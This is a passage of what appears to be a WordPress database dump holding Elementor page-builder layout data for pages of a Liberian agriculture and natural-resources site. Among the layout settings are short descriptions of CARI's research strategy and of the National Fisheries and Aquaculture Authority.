parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2da625e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76368934\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f4d863d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17987,2649,'_elementor_edit_mode','builder'),(17988,2649,'_elementor_template_type','wp-post'),(17989,2649,'_elementor_version','2.7.5'),(17990,2649,'_wp_page_template','default'),(17991,2649,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3d3914\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"70602b6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"237f6997\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"321f3817\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"cari\\\",\\\"tag_id\\\":\\\"49\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"cari\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32aca63d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2da625e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76368934\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f4d863d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:cari\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17992,1592,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17993,2650,'_elementor_edit_mode','builder'),(17994,2650,'_elementor_template_type','wp-post'),(17995,2650,'_elementor_version','2.7.5'),(17996,2650,'_wp_page_template','default'),(17997,2650,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Legislature on Natural Resources Committee coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(18000,2651,'_elementor_edit_mode','builder'),(18001,2651,'_elementor_template_type','wp-post'),(18002,2651,'_elementor_version','2.7.5'),(18003,2651,'_wp_page_template','default'),(18004,2651,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Legislature on Natural Resources Committee coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9db38fc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"571a245f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a94bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1d96f140\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"572e4794\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"65306131\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30437ac5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1bd7b4a2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18006,2652,'_elementor_edit_mode','builder'),(18007,2652,'_elementor_template_type','wp-post'),(18008,2652,'_elementor_version','2.7.5'),(18009,2652,'_wp_page_template','default'),(18010,2652,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Legislature on Natural Resources Committee coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9db38fc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"571a245f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a94bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1d96f140\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"national-legislature\\\",\\\"tag_id\\\":\\\"66\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"national-legislature\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"572e4794\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"65306131\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30437ac5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1bd7b4a2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:national-legislature\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18011,1590,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18012,2653,'_elementor_edit_mode','builder'),(18013,2653,'_elementor_template_type','wp-post'),(18014,2653,'_elementor_version','2.7.5'),(18015,2653,'_wp_page_template','default'),(18016,2653,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db49c3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"793fd76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e046628\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48352ba\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read 